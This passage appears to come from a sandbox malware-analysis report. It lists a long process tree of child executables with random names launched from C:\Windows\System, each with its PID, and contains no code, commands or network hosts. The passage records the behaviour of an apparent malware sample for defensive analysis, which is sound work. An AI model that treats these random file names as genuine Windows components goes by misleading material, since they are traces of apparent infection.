  C:\Windows\System\DwINTHU.exe
  2⤵
  PID:5408
- C:\Windows\System\jiifmbL.exe
  C:\Windows\System\jiifmbL.exe
  2⤵
  PID:5460
- C:\Windows\System\AxDCgdS.exe
  C:\Windows\System\AxDCgdS.exe
  2⤵
  PID:5588
- C:\Windows\System\gCrRtos.exe
  C:\Windows\System\gCrRtos.exe
  2⤵
  PID:5636
- C:\Windows\System\bHoIEEz.exe
  C:\Windows\System\bHoIEEz.exe
  2⤵
  PID:5748
- C:\Windows\System\qoQmPJk.exe
  C:\Windows\System\qoQmPJk.exe
  2⤵
  PID:5784
- C:\Windows\System\XmrBXKt.exe
  C:\Windows\System\XmrBXKt.exe
  2⤵
  PID:5836
- C:\Windows\System\UAWIHrJ.exe
  C:\Windows\System\UAWIHrJ.exe
  2⤵
  PID:5904
- C:\Windows\System\ajOJxBg.exe
  C:\Windows\System\ajOJxBg.exe
  2⤵
  PID:5968
- C:\Windows\System\jVlghlB.exe
  C:\Windows\System\jVlghlB.exe
  2⤵
  PID:6036
- C:\Windows\System\Yhlkbin.exe
  C:\Windows\System\Yhlkbin.exe
  2⤵
  PID:2224
- C:\Windows\System\ilNVprD.exe
  C:\Windows\System\ilNVprD.exe
  2⤵
  PID:5192
- C:\Windows\System\nMgulup.exe
  C:\Windows\System\nMgulup.exe
  2⤵
  PID:5292
- C:\Windows\System\GyPvNJA.exe
  C:\Windows\System\GyPvNJA.exe
  2⤵
  PID:5440
- C:\Windows\System\FswtbdI.exe
  C:\Windows\System\FswtbdI.exe
  2⤵
  PID:5616
- C:\Windows\System\lndSNCe.exe
  C:\Windows\System\lndSNCe.exe
  2⤵
  PID:5796
- C:\Windows\System\OvRYZyM.exe
  C:\Windows\System\OvRYZyM.exe
  2⤵
  PID:4476
- C:\Windows\System\cAPYCTI.exe
  C:\Windows\System\cAPYCTI.exe
  2⤵
  PID:4396
- C:\Windows\System\TrQCesC.exe
  C:\Windows\System\TrQCesC.exe
  2⤵
  PID:2064
- C:\Windows\System\EezOjkv.exe
  C:\Windows\System\EezOjkv.exe
  2⤵
  PID:5732
- C:\Windows\System\zgdwizW.exe
  C:\Windows\System\zgdwizW.exe
  2⤵
  PID:5164
- C:\Windows\System\AxrdXKT.exe
  C:\Windows\System\AxrdXKT.exe
  2⤵
  PID:5496
- C:\Windows\System\lCTHnPk.exe
  C:\Windows\System\lCTHnPk.exe
  2⤵
  PID:6172
- C:\Windows\System\WnwvCwr.exe
  C:\Windows\System\WnwvCwr.exe
  2⤵
  PID:6220
- C:\Windows\System\ARTxKzF.exe
  C:\Windows\System\ARTxKzF.exe
  2⤵
  PID:6256
- C:\Windows\System\AyYmJol.exe
  C:\Windows\System\AyYmJol.exe
  2⤵
  PID:6284
- C:\Windows\System\hoITLaL.exe
  C:\Windows\System\hoITLaL.exe
  2⤵
  PID:6336
- C:\Windows\System\IaixWhr.exe
  C:\Windows\System\IaixWhr.exe
  2⤵
  PID:6376
- C:\Windows\System\oVmMKuc.exe
  C:\Windows\System\oVmMKuc.exe
  2⤵
  PID:6392
- C:\Windows\System\gGMIEPC.exe
  C:\Windows\System\gGMIEPC.exe
  2⤵
  PID:6420
- C:\Windows\System\ptnQXyw.exe
  C:\Windows\System\ptnQXyw.exe
  2⤵
  PID:6444
- C:\Windows\System\HRUPUjH.exe
  C:\Windows\System\HRUPUjH.exe
  2⤵
  PID:6496
- C:\Windows\System\lpWYsLd.exe
  C:\Windows\System\lpWYsLd.exe
  2⤵
  PID:6532
- C:\Windows\System\gIGVqqk.exe
  C:\Windows\System\gIGVqqk.exe
  2⤵
  PID:6564
- C:\Windows\System\fiDUjLD.exe
  C:\Windows\System\fiDUjLD.exe
  2⤵
  PID:6580
- C:\Windows\System\XPEyMFB.exe
  C:\Windows\System\XPEyMFB.exe
  2⤵
  PID:6612
- C:\Windows\System\uSqYuYe.exe
  C:\Windows\System\uSqYuYe.exe
  2⤵
  PID:6636
- C:\Windows\System\WazznMA.exe
  C:\Windows\System\WazznMA.exe
  2⤵
  PID:6688
- C:\Windows\System\oBFCDkR.exe
  C:\Windows\System\oBFCDkR.exe
  2⤵
  PID:6728
- C:\Windows\System\IYaKjzf.exe
  C:\Windows\System\IYaKjzf.exe
  2⤵
  PID:6756
- C:\Windows\System\MxgHPPO.exe
  C:\Windows\System\MxgHPPO.exe
  2⤵
  PID:6784
- C:\Windows\System\PlbpnJS.exe
  C:\Windows\System\PlbpnJS.exe
  2⤵
  PID:6804
- C:\Windows\System\mOHAEZv.exe
  C:\Windows\System\mOHAEZv.exe
  2⤵
  PID:6820
- C:\Windows\System\qqgxvYw.exe
  C:\Windows\System\qqgxvYw.exe
  2⤵
  PID:6868
- C:\Windows\System\IAGpPlm.exe
  C:\Windows\System\IAGpPlm.exe
  2⤵
  PID:6888
- C:\Windows\System\epqOVqQ.exe
  C:\Windows\System\epqOVqQ.exe
  2⤵
  PID:6920
- C:\Windows\System\roMzhLh.exe
  C:\Windows\System\roMzhLh.exe
  2⤵
  PID:6936
- C:\Windows\System\ubJBWqN.exe
  C:\Windows\System\ubJBWqN.exe
  2⤵
  PID:6952
- C:\Windows\System\RryXULl.exe
  C:\Windows\System\RryXULl.exe
  2⤵
  PID:6996
- C:\Windows\System\XbUyFlL.exe
  C:\Windows\System\XbUyFlL.exe
  2⤵
  PID:7040
- C:\Windows\System\xxzmntf.exe
  C:\Windows\System\xxzmntf.exe
  2⤵
  PID:7056
- C:\Windows\System\HZavRFA.exe
  C:\Windows\System\HZavRFA.exe
  2⤵
  PID:7092
- C:\Windows\System\kOcRVKg.exe
  C:\Windows\System\kOcRVKg.exe
  2⤵
  PID:7132
- C:\Windows\System\sFgZDyJ.exe
  C:\Windows\System\sFgZDyJ.exe
  2⤵
  PID:7156
- C:\Windows\System\gQJhdeW.exe
  C:\Windows\System\gQJhdeW.exe
  2⤵
  PID:6156
- C:\Windows\System\zUCSOeI.exe
  C:\Windows\System\zUCSOeI.exe
  2⤵
  PID:6216
- C:\Windows\System\CZtlDSF.exe
  C:\Windows\System\CZtlDSF.exe
  2⤵
  PID:6328
- C:\Windows\System\AaRamKb.exe
  C:\Windows\System\AaRamKb.exe
  2⤵
  PID:6408
- C:\Windows\System\KJFouEg.exe
  C:\Windows\System\KJFouEg.exe
  2⤵
  PID:6488
- C:\Windows\System\lIwcklk.exe
  C:\Windows\System\lIwcklk.exe
  2⤵
  PID:6548
- C:\Windows\System\YoABkTn.exe
  C:\Windows\System\YoABkTn.exe
  2⤵
  PID:6632
- C:\Windows\System\sgEKkRY.exe
  C:\Windows\System\sgEKkRY.exe
  2⤵
  PID:6680
- C:\Windows\System\LHmwJJa.exe
  C:\Windows\System\LHmwJJa.exe
  2⤵
  PID:6796
- C:\Windows\System\PyBnkaV.exe
  C:\Windows\System\PyBnkaV.exe
  2⤵
  PID:5248
- C:\Windows\System\gfcFjUq.exe
  C:\Windows\System\gfcFjUq.exe
  2⤵
  PID:6880
- C:\Windows\System\dOUFlSx.exe
  C:\Windows\System\dOUFlSx.exe
  2⤵
  PID:6972
- C:\Windows\System\AyKbWVi.exe
  C:\Windows\System\AyKbWVi.exe
  2⤵
  PID:7024
- C:\Windows\System\WZYIiji.exe
  C:\Windows\System\WZYIiji.exe
  2⤵
  PID:7140
- C:\Windows\System\EdmZKvw.exe
  C:\Windows\System\EdmZKvw.exe
  2⤵
  PID:6244
- C:\Windows\System\JcddPvE.exe
  C:\Windows\System\JcddPvE.exe
  2⤵
  PID:4284
- C:\Windows\System\iqZivUL.exe
  C:\Windows\System\iqZivUL.exe
  2⤵
  PID:6620
- C:\Windows\System\PzfPNVo.exe
  C:\Windows\System\PzfPNVo.exe
  2⤵
  PID:6740
- C:\Windows\System\QPSBOpK.exe
  C:\Windows\System\QPSBOpK.exe
  2⤵
  PID:6832
- C:\Windows\System\ukWGpRv.exe
  C:\Windows\System\ukWGpRv.exe
  2⤵
  PID:7012
- C:\Windows\System\OZFyimJ.exe
  C:\Windows\System\OZFyimJ.exe
  2⤵
  PID:6200
- C:\Windows\System\jOtkcri.exe
  C:\Windows\System\jOtkcri.exe
  2⤵
  PID:6672
- C:\Windows\System\kqrcSPx.exe
  C:\Windows\System\kqrcSPx.exe
  2⤵
  PID:6988
- C:\Windows\System\sROEedk.exe
  C:\Windows\System\sROEedk.exe
  2⤵
  PID:7300
- C:\Windows\System\iGfdLcx.exe
  C:\Windows\System\iGfdLcx.exe
  2⤵
  PID:7324
- C:\Windows\System\DNYsSeO.exe
  C:\Windows\System\DNYsSeO.exe
  2⤵
  PID:7360
- C:\Windows\System\tfUClkf.exe
  C:\Windows\System\tfUClkf.exe
  2⤵
  PID:7384
- C:\Windows\System\BoucPep.exe
  C:\Windows\System\BoucPep.exe
  2⤵
  PID:7416
- C:\Windows\System\muopxyF.exe
  C:\Windows\System\muopxyF.exe
  2⤵
  PID:7444
- C:\Windows\System\TWulfBW.exe
  C:\Windows\System\TWulfBW.exe
  2⤵
  PID:7472
- C:\Windows\System\mtfxoUO.exe
  C:\Windows\System\mtfxoUO.exe
  2⤵
  PID:7496
- C:\Windows\System\jeCnkLj.exe
  C:\Windows\System\jeCnkLj.exe
  2⤵
  PID:7524
- C:\Windows\System\WBBYvRt.exe
  C:\Windows\System\WBBYvRt.exe
  2⤵
  PID:7552
- C:\Windows\System\FYAzOZz.exe
  C:\Windows\System\FYAzOZz.exe
  2⤵
  PID:7584
- C:\Windows\System\bMpVKvV.exe
  C:\Windows\System\bMpVKvV.exe
  2⤵
  PID:7612
- C:\Windows\System\NwpQZfi.exe
  C:\Windows\System\NwpQZfi.exe
  2⤵
  PID:7636
- C:\Windows\System\SuVogRG.exe
  C:\Windows\System\SuVogRG.exe
  2⤵
  PID:7652
- C:\Windows\System\gFLwekM.exe
  C:\Windows\System\gFLwekM.exe
  2⤵
  PID:7672
- C:\Windows\System\rMwEGES.exe
  C:\Windows\System\rMwEGES.exe
  2⤵
  PID:7696
- C:\Windows\System\BiHmrwQ.exe
  C:\Windows\System\BiHmrwQ.exe
  2⤵
  PID:7712
- C:\Windows\System\kWwhNdk.exe
  C:\Windows\System\kWwhNdk.exe
  2⤵
  PID:7728
- C:\Windows\System\GcPbAnF.exe
  C:\Windows\System\GcPbAnF.exe
  2⤵
  PID:7744
- C:\Windows\System\uDbxenx.exe
  C:\Windows\System\uDbxenx.exe
  2⤵
  PID:7796
- C:\Windows\System\KRRTCTj.exe
  C:\Windows\System\KRRTCTj.exe
  2⤵
  PID:7828
- C:\Windows\System\yQxDMEX.exe
  C:\Windows\System\yQxDMEX.exe
  2⤵
  PID:7864
- C:\Windows\System\ZTpZFnX.exe
  C:\Windows\System\ZTpZFnX.exe
  2⤵
  PID:7896
- C:\Windows\System\tEabiyi.exe
  C:\Windows\System\tEabiyi.exe
  2⤵
  PID:7944
- C:\Windows\System\ZUBTFWW.exe
  C:\Windows\System\ZUBTFWW.exe
  2⤵
  PID:7960
- C:\Windows\System\ZUFZGmn.exe
  C:\Windows\System\ZUFZGmn.exe
  2⤵
  PID:7984
- C:\Windows\System\ljBwAVK.exe
  C:\Windows\System\ljBwAVK.exe
  2⤵
  PID:8016
- C:\Windows\System\VCbeAld.exe
  C:\Windows\System\VCbeAld.exe
  2⤵
  PID:8052
- C:\Windows\System\wQOdNmj.exe
  C:\Windows\System\wQOdNmj.exe
  2⤵
  PID:8084
- C:\Windows\System\xlcrtFT.exe
  C:\Windows\System\xlcrtFT.exe
  2⤵
  PID:8112
- C:\Windows\System\hjuBAFy.exe
  C:\Windows\System\hjuBAFy.exe
  2⤵
  PID:8140
- C:\Windows\System\qPVGFMv.exe
  C:\Windows\System\qPVGFMv.exe
  2⤵
  PID:8168
- C:\Windows\System\yssJCDE.exe
  C:\Windows\System\yssJCDE.exe
  2⤵
  PID:6436
- C:\Windows\System\zfLXCAY.exe
  C:\Windows\System\zfLXCAY.exe
  2⤵
  PID:7176
- C:\Windows\System\RriogxP.exe
  C:\Windows\System\RriogxP.exe
  2⤵
  PID:7204
- C:\Windows\System\MdyJeUe.exe
  C:\Windows\System\MdyJeUe.exe
  2⤵
  PID:7228
- C:\Windows\System\UYctuHO.exe
  C:\Windows\System\UYctuHO.exe
  2⤵
  PID:7260
- C:\Windows\System\OgOMxFX.exe
  C:\Windows\System\OgOMxFX.exe
  2⤵
  PID:232
- C:\Windows\System\CiKiWFI.exe
  C:\Windows\System\CiKiWFI.exe
  2⤵
  PID:7452
- C:\Windows\System\NWIgWYu.exe
  C:\Windows\System\NWIgWYu.exe
  2⤵
  PID:7516
- C:\Windows\System\nJMsKys.exe
  C:\Windows\System\nJMsKys.exe
  2⤵
  PID:7576
- C:\Windows\System\vZpAAsS.exe
  C:\Windows\System\vZpAAsS.exe
  2⤵
  PID:7644
- C:\Windows\System\cRJlepM.exe
  C:\Windows\System\cRJlepM.exe
  2⤵
  PID:7680
- C:\Windows\System\jproGft.exe
  C:\Windows\System\jproGft.exe
  2⤵
  PID:7720
- C:\Windows\System\fcUaVmW.exe
  C:\Windows\System\fcUaVmW.exe
  2⤵
  PID:7876
- C:\Windows\System\AqcWEKc.exe
  C:\Windows\System\AqcWEKc.exe
  2⤵
  PID:7952
- C:\Windows\System\eezxFAA.exe
  C:\Windows\System\eezxFAA.exe
  2⤵
  PID:8028
- C:\Windows\System\aFmJtHV.exe
  C:\Windows\System\aFmJtHV.exe
  2⤵
  PID:8104
- C:\Windows\System\PlCkmsf.exe
  C:\Windows\System\PlCkmsf.exe
  2⤵
  PID:8160
- C:\Windows\System\dKHZXio.exe
  C:\Windows\System\dKHZXio.exe
  2⤵
  PID:7172
- C:\Windows\System\IHmYdCw.exe
  C:\Windows\System\IHmYdCw.exe
  2⤵
  PID:7244
- C:\Windows\System\PLqPTMz.exe
  C:\Windows\System\PLqPTMz.exe
  2⤵
  PID:7320
- C:\Windows\System\ONXwuKB.exe
  C:\Windows\System\ONXwuKB.exe
  2⤵
  PID:7380
- C:\Windows\System\ZZQVfoG.exe
  C:\Windows\System\ZZQVfoG.exe
  2⤵
  PID:7436
- C:\Windows\System\EGsILnZ.exe
  C:\Windows\System\EGsILnZ.exe
  2⤵
  PID:7572
- C:\Windows\System\RywCUyg.exe
  C:\Windows\System\RywCUyg.exe
  2⤵
  PID:7772
- C:\Windows\System\WoAdxIh.exe
  C:\Windows\System\WoAdxIh.exe
  2⤵
  PID:416
- C:\Windows\System\lsXLQjc.exe
  C:\Windows\System\lsXLQjc.exe
  2⤵
  PID:8096
- C:\Windows\System\amqERRQ.exe
  C:\Windows\System\amqERRQ.exe
  2⤵
  PID:7200
- C:\Windows\System\rYcbhwx.exe
  C:\Windows\System\rYcbhwx.exe
  2⤵
  PID:7368
- C:\Windows\System\JPDUnXP.exe
  C:\Windows\System\JPDUnXP.exe
  2⤵
  PID:7628
- C:\Windows\System\FqYmZaE.exe
  C:\Windows\System\FqYmZaE.exe
  2⤵
  PID:8004
- C:\Windows\System\kJWGwMf.exe
  C:\Windows\System\kJWGwMf.exe
  2⤵
  PID:7288
- C:\Windows\System\piqQgQf.exe
  C:\Windows\System\piqQgQf.exe
  2⤵
  PID:7956
- C:\Windows\System\cILGTon.exe
  C:\Windows\System\cILGTon.exe
  2⤵
  PID:7272
- C:\Windows\System\tSnNwHJ.exe
  C:\Windows\System\tSnNwHJ.exe
  2⤵
  PID:8212
- C:\Windows\System\rVyglVB.exe
  C:\Windows\System\rVyglVB.exe
  2⤵
  PID:8240
- C:\Windows\System\kiOpFkH.exe
  C:\Windows\System\kiOpFkH.exe
  2⤵
  PID:8268
- C:\Windows\System\oTBjZeJ.exe
  C:\Windows\System\oTBjZeJ.exe
  2⤵
  PID:8296
- C:\Windows\System\aJOajmA.exe
  C:\Windows\System\aJOajmA.exe
  2⤵
  PID:8324
- C:\Windows\System\exmPYnL.exe
  C:\Windows\System\exmPYnL.exe
  2⤵
  PID:8352
- C:\Windows\System\ZgZdPHg.exe
  C:\Windows\System\ZgZdPHg.exe
  2⤵
  PID:8380
- C:\Windows\System\CxSfxbj.exe
  C:\Windows\System\CxSfxbj.exe
  2⤵
  PID:8408
- C:\Windows\System\rqTVBDz.exe
  C:\Windows\System\rqTVBDz.exe
  2⤵
  PID:8436
- C:\Windows\System\EuJASFg.exe
  C:\Windows\System\EuJASFg.exe
  2⤵
  PID:8464
- C:\Windows\System\WMZbkyB.exe
  C:\Windows\System\WMZbkyB.exe
  2⤵
  PID:8492
- C:\Windows\System\VZqqXUs.exe
  C:\Windows\System\VZqqXUs.exe
  2⤵
  PID:8520
- C:\Windows\System\RJFboHQ.exe
  C:\Windows\System\RJFboHQ.exe
  2⤵
  PID:8548
- C:\Windows\System\SrUqyck.exe
  C:\Windows\System\SrUqyck.exe
  2⤵
  PID:8576
- C:\Windows\System\ASSsDPZ.exe
  C:\Windows\System\ASSsDPZ.exe
  2⤵
  PID:8604
- C:\Windows\System\uDBTFRD.exe
  C:\Windows\System\uDBTFRD.exe
  2⤵
  PID:8632
- C:\Windows\System\qmoibUP.exe
  C:\Windows\System\qmoibUP.exe
  2⤵
  PID:8660
- C:\Windows\System\DXgQsXq.exe
  C:\Windows\System\DXgQsXq.exe
  2⤵
  PID:8688
- C:\Windows\System\JBxzYaQ.exe
  C:\Windows\System\JBxzYaQ.exe
  2⤵
  PID:8716
- C:\Windows\System\OmTCLmw.exe
  C:\Windows\System\OmTCLmw.exe
  2⤵
  PID:8744
- C:\Windows\System\aOyMRwj.exe
  C:\Windows\System\aOyMRwj.exe
  2⤵
  PID:8788
- C:\Windows\System\GxGccJI.exe
  C:\Windows\System\GxGccJI.exe
  2⤵
  PID:8804
- C:\Windows\System\jsmObqJ.exe
  C:\Windows\System\jsmObqJ.exe
  2⤵
  PID:8832
- C:\Windows\System\eTpsFmx.exe
  C:\Windows\System\eTpsFmx.exe
  2⤵
  PID:8860
- C:\Windows\System\ORkQilq.exe
  C:\Windows\System\ORkQilq.exe
  2⤵
  PID:8888
- C:\Windows\System\XyzEgLB.exe
  C:\Windows\System\XyzEgLB.exe
  2⤵
  PID:8916
- C:\Windows\System\LHwGPpb.exe
  C:\Windows\System\LHwGPpb.exe
  2⤵
  PID:8944
- C:\Windows\System\gNRdhrS.exe
  C:\Windows\System\gNRdhrS.exe
  2⤵
  PID:8972
- C:\Windows\System\NgQrxkU.exe
  C:\Windows\System\NgQrxkU.exe
  2⤵
  PID:9000
- C:\Windows\System\XpCKbOS.exe
  C:\Windows\System\XpCKbOS.exe
  2⤵
  PID:9028
- C:\Windows\System\StULLvm.exe
  C:\Windows\System\StULLvm.exe
  2⤵
  PID:9056
- C:\Windows\System\ATgWDHz.exe
  C:\Windows\System\ATgWDHz.exe
  2⤵
  PID:9084
- C:\Windows\System\CgLKfRk.exe
  C:\Windows\System\CgLKfRk.exe
  2⤵
  PID:9112
- C:\Windows\System\VRZJBXA.exe
  C:\Windows\System\VRZJBXA.exe
  2⤵
  PID:9140
- C:\Windows\System\RbcdfYA.exe
  C:\Windows\System\RbcdfYA.exe
  2⤵
  PID:9168
- C:\Windows\System\fovdsFv.exe
  C:\Windows\System\fovdsFv.exe
  2⤵
  PID:9196
- C:\Windows\System\QozMDaW.exe
  C:\Windows\System\QozMDaW.exe
  2⤵
  PID:8204
- C:\Windows\System\kmugrpm.exe
  C:\Windows\System\kmugrpm.exe
  2⤵
  PID:8280
- C:\Windows\System\BJQmvLn.exe
  C:\Windows\System\BJQmvLn.exe
  2⤵
  PID:8344
- C:\Windows\System\seuQktm.exe
  C:\Windows\System\seuQktm.exe
  2⤵
  PID:8404
- C:\Windows\System\dqFHImU.exe
  C:\Windows\System\dqFHImU.exe
  2⤵
  PID:8476
- C:\Windows\System\SYhxZyp.exe
  C:\Windows\System\SYhxZyp.exe
  2⤵
  PID:8540
- C:\Windows\System\ReatoHN.exe
  C:\Windows\System\ReatoHN.exe
  2⤵
  PID:8596
- C:\Windows\System\IsoaFXQ.exe
  C:\Windows\System\IsoaFXQ.exe
  2⤵
  PID:8656
- C:\Windows\System\rjNFOsV.exe
  C:\Windows\System\rjNFOsV.exe
  2⤵
  PID:8728
- C:\Windows\System\CQCJtNj.exe
  C:\Windows\System\CQCJtNj.exe
  2⤵
  PID:8796
- C:\Windows\System\nkxhnFm.exe
  C:\Windows\System\nkxhnFm.exe
  2⤵
  PID:8856
- C:\Windows\System\vGTrzea.exe
  C:\Windows\System\vGTrzea.exe
  2⤵
  PID:8928
- C:\Windows\System\XXjVCDs.exe
  C:\Windows\System\XXjVCDs.exe
  2⤵
  PID:8964
- C:\Windows\System\JlsOWpo.exe
  C:\Windows\System\JlsOWpo.exe
  2⤵
  PID:9024
- C:\Windows\System\ePBGlWV.exe
  C:\Windows\System\ePBGlWV.exe
  2⤵
  PID:9124
- C:\Windows\System\qXZZfeA.exe
  C:\Windows\System\qXZZfeA.exe
  2⤵
  PID:9188
- C:\Windows\System\MIfpDdf.exe
  C:\Windows\System\MIfpDdf.exe
  2⤵
  PID:8264
- C:\Windows\System\AdNKOwf.exe
  C:\Windows\System\AdNKOwf.exe
  2⤵
  PID:8432
- C:\Windows\System\UCeqMqt.exe
  C:\Windows\System\UCeqMqt.exe
  2⤵
  PID:8572
- C:\Windows\System\TZNrbYF.exe
  C:\Windows\System\TZNrbYF.exe
  2⤵
  PID:8712
- C:\Windows\System\LllMHOG.exe
  C:\Windows\System\LllMHOG.exe
  2⤵
  PID:8884
- C:\Windows\System\DhPbVoT.exe
  C:\Windows\System\DhPbVoT.exe
  2⤵
  PID:9052
- C:\Windows\System\kaXyYWk.exe
  C:\Windows\System\kaXyYWk.exe
  2⤵
  PID:9160
- C:\Windows\System\GTJCdgJ.exe
  C:\Windows\System\GTJCdgJ.exe
  2⤵
  PID:8504
- C:\Windows\System\mPkriEv.exe
  C:\Windows\System\mPkriEv.exe
  2⤵
  PID:8844
- C:\Windows\System\wDgkNhG.exe
  C:\Windows\System\wDgkNhG.exe
  2⤵
  PID:9152
- C:\Windows\System\NBeFHhD.exe
  C:\Windows\System\NBeFHhD.exe
  2⤵
  PID:8768
- C:\Windows\System\ktbOIlz.exe
  C:\Windows\System\ktbOIlz.exe
  2⤵
  PID:9076
- C:\Windows\System\odjsvOC.exe
  C:\Windows\System\odjsvOC.exe
  2⤵
  PID:9236
- C:\Windows\System\vsSCcmV.exe
  C:\Windows\System\vsSCcmV.exe
  2⤵
  PID:9264
- C:\Windows\System\FLlNbja.exe
  C:\Windows\System\FLlNbja.exe
  2⤵
  PID:9292
- C:\Windows\System\DkRCIrf.exe
  C:\Windows\System\DkRCIrf.exe
  2⤵
  PID:9328
- C:\Windows\System\udCdlBE.exe
  C:\Windows\System\udCdlBE.exe
  2⤵
  PID:9352
- C:\Windows\System\DqGFXWe.exe
  C:\Windows\System\DqGFXWe.exe
  2⤵
  PID:9380
- C:\Windows\System\CbfuHhA.exe
  C:\Windows\System\CbfuHhA.exe
  2⤵
  PID:9408
- C:\Windows\System\HcpoMlA.exe
  C:\Windows\System\HcpoMlA.exe
  2⤵
  PID:9436
- C:\Windows\System\DNRyEpc.exe
  C:\Windows\System\DNRyEpc.exe
  2⤵
  PID:9464
- C:\Windows\System\tRhDozw.exe
  C:\Windows\System\tRhDozw.exe
  2⤵
  PID:9492
- C:\Windows\System\jdILGfN.exe
  C:\Windows\System\jdILGfN.exe
  2⤵
  PID:9520
- C:\Windows\System\oBIQSxN.exe
  C:\Windows\System\oBIQSxN.exe
  2⤵
  PID:9548
- C:\Windows\System\hcXsDQH.exe
  C:\Windows\System\hcXsDQH.exe
  2⤵
  PID:9576
- C:\Windows\System\AMtsQVO.exe
  C:\Windows\System\AMtsQVO.exe
  2⤵
  PID:9604
- C:\Windows\System\xntHdjj.exe
  C:\Windows\System\xntHdjj.exe
  2⤵
  PID:9632
- C:\Windows\System\dklRtvS.exe
  C:\Windows\System\dklRtvS.exe
  2⤵
  PID:9660
- C:\Windows\System\UBdGrAE.exe
  C:\Windows\System\UBdGrAE.exe
  2⤵
  PID:9688
- C:\Windows\System\RPMPaRo.exe
  C:\Windows\System\RPMPaRo.exe
  2⤵
  PID:9716
- C:\Windows\System\BTGgYsc.exe
  C:\Windows\System\BTGgYsc.exe
  2⤵
  PID:9744
- C:\Windows\System\xNmfmMk.exe
  C:\Windows\System\xNmfmMk.exe
  2⤵
  PID:9772
- C:\Windows\System\XmAzdTk.exe
  C:\Windows\System\XmAzdTk.exe
  2⤵
  PID:9800
- C:\Windows\System\COvvTkD.exe
  C:\Windows\System\COvvTkD.exe
  2⤵
  PID:9828
- C:\Windows\System\YXWYNym.exe
  C:\Windows\System\YXWYNym.exe
  2⤵
  PID:9856
- C:\Windows\System\FycvZZP.exe
  C:\Windows\System\FycvZZP.exe
  2⤵
  PID:9884
- C:\Windows\System\tSInbFs.exe
  C:\Windows\System\tSInbFs.exe
  2⤵
  PID:9912
- C:\Windows\System\SGjFzjB.exe
  C:\Windows\System\SGjFzjB.exe
  2⤵
  PID:9940
- C:\Windows\System\ihqcBsm.exe
  C:\Windows\System\ihqcBsm.exe
  2⤵
  PID:9968
- C:\Windows\System\rNpUTJs.exe
  C:\Windows\System\rNpUTJs.exe
  2⤵
  PID:9996
- C:\Windows\System\pLxhoZk.exe
  C:\Windows\System\pLxhoZk.exe
  2⤵
  PID:10024
- C:\Windows\System\hnFuHTo.exe
  C:\Windows\System\hnFuHTo.exe
  2⤵
  PID:10052
- C:\Windows\System\dVbPfqj.exe
  C:\Windows\System\dVbPfqj.exe
  2⤵
  PID:10080
- C:\Windows\System\bkjlipf.exe
  C:\Windows\System\bkjlipf.exe
  2⤵
  PID:10108
- C:\Windows\System\ExHyWHP.exe
  C:\Windows\System\ExHyWHP.exe
  2⤵
  PID:10144
- C:\Windows\System\iTqzpMm.exe
  C:\Windows\System\iTqzpMm.exe
  2⤵
  PID:10176
- C:\Windows\System\aGoinuu.exe
  C:\Windows\System\aGoinuu.exe
  2⤵
  PID:10212
- C:\Windows\System\xnfDAoZ.exe
  C:\Windows\System\xnfDAoZ.exe
  2⤵
  PID:9232
- C:\Windows\System\UlqdArp.exe
  C:\Windows\System\UlqdArp.exe
  2⤵
  PID:9304
- C:\Windows\System\tlWtKyC.exe
  C:\Windows\System\tlWtKyC.exe
  2⤵
  PID:9404
- C:\Windows\System\AaVkBur.exe
  C:\Windows\System\AaVkBur.exe
  2⤵
  PID:9484
- C:\Windows\System\xjRqNvt.exe
  C:\Windows\System\xjRqNvt.exe
  2⤵
  PID:9560
- C:\Windows\System\fwJlpoo.exe
  C:\Windows\System\fwJlpoo.exe
  2⤵
  PID:9652
- C:\Windows\System\eHAPHJh.exe
  C:\Windows\System\eHAPHJh.exe
  2⤵
  PID:9684
- C:\Windows\System\YHrUtmV.exe
  C:\Windows\System\YHrUtmV.exe
  2⤵
  PID:9736
- C:\Windows\System\BbXduEk.exe
  C:\Windows\System\BbXduEk.exe
  2⤵
  PID:9848
- C:\Windows\System\rVEuHsS.exe
  C:\Windows\System\rVEuHsS.exe
  2⤵
  PID:9964
- C:\Windows\System\JoZpdVU.exe
  C:\Windows\System\JoZpdVU.exe
  2⤵
  PID:10072
- C:\Windows\System\vubUCnN.exe
  C:\Windows\System\vubUCnN.exe
  2⤵
  PID:10132
- C:\Windows\System\QzKojSA.exe
  C:\Windows\System\QzKojSA.exe
  2⤵
  PID:9260
- C:\Windows\System\AfoNCGK.exe
  C:\Windows\System\AfoNCGK.exe
  2⤵
  PID:9512
- C:\Windows\System\TDFuXyf.exe
  C:\Windows\System\TDFuXyf.exe
  2⤵
  PID:9600
- C:\Windows\System\XUnzfHq.exe
  C:\Windows\System\XUnzfHq.exe
  2⤵
  PID:9672
- C:\Windows\System\BXQLeLg.exe
  C:\Windows\System\BXQLeLg.exe
  2⤵
  PID:9792
- C:\Windows\System\nDBLzpD.exe
  C:\Windows\System\nDBLzpD.exe
  2⤵
  PID:10160
- C:\Windows\System\kHGxytX.exe
  C:\Windows\System\kHGxytX.exe
  2⤵
  PID:9348
- C:\Windows\System\nwgyseF.exe
  C:\Windows\System\nwgyseF.exe
  2⤵
  PID:10036
- C:\Windows\System\GusiIuO.exe
  C:\Windows\System\GusiIuO.exe
  2⤵
  PID:10260
- C:\Windows\System\okTwemn.exe
  C:\Windows\System\okTwemn.exe
  2⤵
  PID:10284
- C:\Windows\System\ZVuTUJa.exe
  C:\Windows\System\ZVuTUJa.exe
  2⤵
  PID:10332
- C:\Windows\System\dABXSPP.exe
  C:\Windows\System\dABXSPP.exe
  2⤵
  PID:10364
- C:\Windows\System\brSrRzi.exe
  C:\Windows\System\brSrRzi.exe
  2⤵
  PID:10392
- C:\Windows\System\jBXhPYF.exe
  C:\Windows\System\jBXhPYF.exe
  2⤵
  PID:10408
- C:\Windows\System\ukBGYUj.exe
  C:\Windows\System\ukBGYUj.exe
  2⤵
  PID:10436
- C:\Windows\System\MThVzvZ.exe
  C:\Windows\System\MThVzvZ.exe
  2⤵
  PID:10468
- C:\Windows\System\iRkTjtP.exe
  C:\Windows\System\iRkTjtP.exe
  2⤵
  PID:10492
- C:\Windows\System\RDejuDO.exe
  C:\Windows\System\RDejuDO.exe
  2⤵
  PID:10520
- C:\Windows\System\JREVSGE.exe
  C:\Windows\System\JREVSGE.exe
  2⤵
  PID:10548
- C:\Windows\System\fQiEBtO.exe
  C:\Windows\System\fQiEBtO.exe
  2⤵
  PID:10576
- C:\Windows\System\hYBsQQb.exe
  C:\Windows\System\hYBsQQb.exe
  2⤵
  PID:10608
- C:\Windows\System\UiYphLH.exe
  C:\Windows\System\UiYphLH.exe
  2⤵
  PID:10632
- C:\Windows\System\kSaaGtc.exe
  C:\Windows\System\kSaaGtc.exe
  2⤵
  PID:10660
- C:\Windows\System\XTBxEtz.exe
